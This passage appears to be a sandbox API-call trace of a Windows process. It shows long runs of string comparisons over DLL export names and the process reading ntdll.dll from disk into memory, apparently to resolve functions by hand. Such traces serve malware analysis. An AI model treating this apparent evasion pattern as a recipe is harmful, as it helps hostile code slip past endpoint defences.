(lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0090.693] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0090.693] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0090.693] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Connect") returned -1 [0090.693] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0090.693] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0090.693] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0090.693] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CheckInitDde") returned 1 [0090.693] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CleanROTForApartment") returned 1 [0090.693] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="ClipboardProcessUninitialize") returned 1 [0090.693] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAddRefServerProcess") returned 1 [0090.693] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAicGetTokenForCOM") returned 1 [0090.693] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAllowSetForegroundWindow") returned 0 [0090.693] lstrcmpA (lpString1="CoBuildVersion", lpString2="BindMoniker") returned 1 [0090.693] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree") returned 1 [0090.694] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree64") returned 1 [0090.694] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0090.694] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0090.694] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0090.694] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0090.694] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize") returned 1 [0090.694] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize64") returned 1 [0090.694] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0090.694] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0090.694] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0090.694] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0090.694] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromOle1Class") returned 1 [0090.694] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgID") returned 1 [0090.694] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgIDEx") returned 1 [0090.694] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromString") returned 1 [0090.694] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0090.694] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0090.694] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0090.694] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0090.694] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0090.694] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0090.694] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0090.694] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0090.694] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0090.694] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Connect") returned -1 [0090.694] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0090.694] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0090.694] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0090.694] lstrcmpA (lpString1="CoBuildVersion", lpString2="CheckInitDde") returned 1 [0090.866] GetProcessHeap () returned 0x5b0000 [0090.866] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x40e8040 | out: hHeap=0x5b0000) returned 1 [0090.896] GetProcessHeap () returned 0x5b0000 [0090.896] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5c90e0 [0090.896] LoadLibraryA (lpLibFileName="Ntdll.dll") returned 0x7ffc5f810000 [0090.896] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0090.896] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0090.896] GetModuleFileNameA (in: hModule=0x7ffc5f810000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0090.897] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0090.897] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0090.897] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0090.897] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1817160) returned 1 [0090.897] GetProcessHeap () returned 0x5b0000 [0090.897] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1bba48) returned 0x40ef040 [0091.093] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0091.094] ReadFile (in: hFile=0x140, lpBuffer=0x40ef040, nNumberOfBytesToRead=0x1bba48, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40ef040*, lpNumberOfBytesRead=0x14f5a4*=0x1bba48, lpOverlapped=0x0) returned 1 [0091.113] CloseHandle (hObject=0x140) returned 1 [0091.113] lstrcmpA (lpString1="A_SHAFinal", lpString2="A_SHAFinal") returned 0 [0091.113] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAFinal") returned 1 [0091.113] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAInit") returned 0 [0091.113] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAFinal") returned 1 [0091.113] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAInit") returned 1 [0091.113] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAUpdate") returned 0 [0091.113] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAFinal") returned 1 [0091.113] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAInit") returned 1 [0091.113] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAUpdate") returned 1 [0091.114] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 0 [0091.114] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAFinal") returned 1 [0091.114] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAInit") returned 1 [0091.114] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAUpdate") returned 1 [0091.114] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0091.114] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcFreeCompletionListMessage") returned 0 [0091.114] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAFinal") returned 1 [0091.114] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAInit") returned 1 [0091.114] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAUpdate") returned 1 [0091.114] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0091.114] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcFreeCompletionListMessage") returned 1 [0091.114] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcGetCompletionListLastMessageInformation") returned 0 [0091.114] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAFinal") returned 1 [0091.114] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAInit") returned 1 [0091.114] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAUpdate") returned 1 [0091.114] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0091.114] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcFreeCompletionListMessage") returned 1 [0091.114] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0091.114] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListMessageAttributes") returned 0 [0091.114] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAFinal") returned 1 [0091.114] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAInit") returned 1 [0091.115] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAUpdate") returned 1 [0091.115] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0091.115] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcFreeCompletionListMessage") returned 1 [0091.115] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0091.115] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0091.115] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetHeaderSize") returned 0 [0091.115] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAFinal") returned 1 [0091.115] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAInit") returned 1 [0091.115] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0091.115] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0091.115] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0091.115] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0091.115] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0091.115] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0091.115] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 0 [0091.115] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAFinal") returned 1 [0091.115] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAInit") returned 1 [0091.115] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAUpdate") returned 1 [0091.115] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0091.115] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0091.115] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0091.115] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0091.115] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0091.115] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0091.115] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 0 [0091.115] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAFinal") returned 1 [0091.115] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAInit") returned 1 [0091.116] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAUpdate") returned 1 [0091.116] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0091.116] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcFreeCompletionListMessage") returned 1 [0091.116] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0091.116] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0091.116] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetHeaderSize") returned 1 [0091.116] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageAttribute") returned 1 [0091.116] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0091.116] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 0 [0091.116] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAFinal") returned 1 [0091.116] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAInit") returned 1 [0091.116] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0091.116] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0091.116] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0091.116] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0091.116] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0091.116] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0091.116] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 1 [0091.116] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0091.116] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0091.116] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcInitializeMessageAttribute") returned 0 [0091.116] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAFinal") returned 1 [0091.116] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAInit") returned 1 [0091.116] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAUpdate") returned 1 [0091.116] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0091.116] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcFreeCompletionListMessage") returned 1 [0091.116] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0091.117] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0091.117] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetHeaderSize") returned 1 [0091.117] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageAttribute") returned 1 [0091.117] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0091.117] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0091.117] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcInitializeMessageAttribute") returned 1 [0091.117] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcMaxAllowedMessageLength") returned 0 [0091.117] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAFinal") returned 1 [0091.117] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAInit") returned 1 [0091.117] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0091.117] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0091.117] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0091.117] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0091.117] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0091.117] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0091.117] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0091.117] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0091.117] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0091.117] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0091.117] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0091.117] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 0 [0091.118] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0091.118] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0091.118] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0091.118] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0091.118] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0091.118] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0091.118] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0091.118] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0091.118] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0091.118] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0091.118] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0091.118] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0091.118] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0091.118] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0091.118] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 0 [0091.118] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAFinal") returned 1 [0091.118] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAInit") returned 1 [0091.118] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAUpdate") returned 1 [0091.118] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0091.118] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0091.118] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0091.118] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0091.118] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0091.118] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0091.118] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0091.118] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0091.118] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0091.118] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0091.119] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0091.119] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0091.119] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRundownCompletionList") returned 0 [0091.119] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAFinal") returned 1 [0091.119] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAInit") returned 1 [0091.119] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0091.119] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0091.119] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0091.119] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0091.119] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0091.119] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0091.119] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0091.119] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0091.119] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0091.119] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0091.119] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0091.119] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0091.119] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0091.119] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRundownCompletionList") returned 1 [0091.119] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcUnregisterCompletionList") returned 0 [0091.119] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0091.120] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0091.120] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0091.120] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0091.120] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0091.120] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0091.120] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0091.120] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0091.120] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0091.120] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0091.120] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0091.120] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0091.120] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0091.120] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0091.120] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0091.120] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRundownCompletionList") returned 1 [0091.120] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionList") returned 1 [0091.120] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 0 [0091.120] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAFinal") returned 1 [0091.120] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAInit") returned 1 [0091.120] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAUpdate") returned 1 [0091.120] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0091.120] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcFreeCompletionListMessage") returned 1 [0091.120] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0091.120] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0091.120] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetHeaderSize") returned 1 [0091.120] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageAttribute") returned 1 [0091.120] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0091.120] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0091.121] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcInitializeMessageAttribute") returned 1 [0091.121] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0091.121] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionList") returned 1 [0091.121] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0091.121] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRundownCompletionList") returned 1 [0091.121] lstrcmpA 